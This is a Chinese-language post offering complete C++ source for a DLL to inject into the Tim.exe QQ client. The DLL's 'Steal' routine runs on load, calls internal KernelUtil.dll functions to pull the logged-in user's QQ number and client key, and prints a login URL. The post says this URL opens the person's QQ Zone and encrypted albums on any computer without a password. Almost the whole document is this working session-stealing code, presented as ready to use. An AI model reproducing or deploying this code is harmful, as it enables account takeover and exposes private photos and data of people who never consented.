编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~
DLL源码:
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>
//定义CTXStringW为BSTR
typedef BSTR CTXStringW;
CTXStringW AllocTXString(const wchar_t* lpSrc)
{
if (lpSrc == NULL) return NULL;
BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
if (bBuffer == NULL) return NULL;
DWORD dwZero = 0;
DWORD dwCount = 3;
DWORD dwLenth = wcslen(lpSrc) + 1;
memmove(bBuffer + 0 * 4, &dwZero, 4);
memmove(bBuffer + 1 * 4, &dwCount, 4);
memmove(bBuffer + 2 * 4, &dwLenth, 4);
memmove(bBuffer + 3 * 4, &dwLenth, 4);
wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
return CTXStringW(bBuffer + 16);
}
VOID Steal()
{
do {
HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
if (hKernelUtil == NULL)
{
OutputDebugStringA("Get KernelUtil Module failed \n");
break;
}
PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
if (PtrGetSelfUin == NULL)
{
OutputDebugStringA("Get GetSelfUin Function failed \n");
break;
}
DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
if (uin == NULL)
{
OutputDebugStringA("Invoke GetSelfUin Function failed \n");
break;
}
// Print QQ number
char szUin[MAX_PATH] = { 0 };
sprintf(szUin, "%d", uin);
PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
if (GetSignature == NULL)
{
OutputDebugStringA("Get GetSignature Function failed \n");
break;
}
WCHAR wsBuffer[MAX_PATH] = { 0 };
CTXStringW ClientKey = AllocTXString(wsBuffer);
PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
if (res == NULL)
{
OutputDebugStringA("Invoke GetSignature Function failed \n");
break;
}
// 复制下面链接,无需密码,进入QQ空间
char msg[MAX_PATH] = { 0 };
sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
OutputDebugStringA(msg);
} while (0);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
Steal();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}